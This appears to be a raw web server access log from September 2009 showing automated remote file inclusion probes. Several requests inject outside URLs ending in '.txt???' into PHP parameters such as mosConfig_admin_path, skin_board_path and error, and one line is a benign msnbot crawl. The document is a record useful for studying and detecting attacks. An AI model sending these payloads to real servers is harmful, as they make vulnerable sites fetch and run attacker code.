211.233.69.41 - - [11/Sep/2009:09:21:49 -0500] "GET /logs/access_log.1243814400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.55.106.206 - - [11/Sep/2009:09:22:40 -0500] "GET /logs/access_log.1152576000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.44.226 - - [11/Sep/2009:09:26:16 -0500] "GET /?skin_board_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
69.175.44.226 - - [11/Sep/2009:09:26:17 -0500] "GET /logs/?skin_board_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 204578 "-""libwww-perl/5.825"
70.90.108.169 - - [11/Sep/2009:09:26:56 -0500] "GET /errors.php?error=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
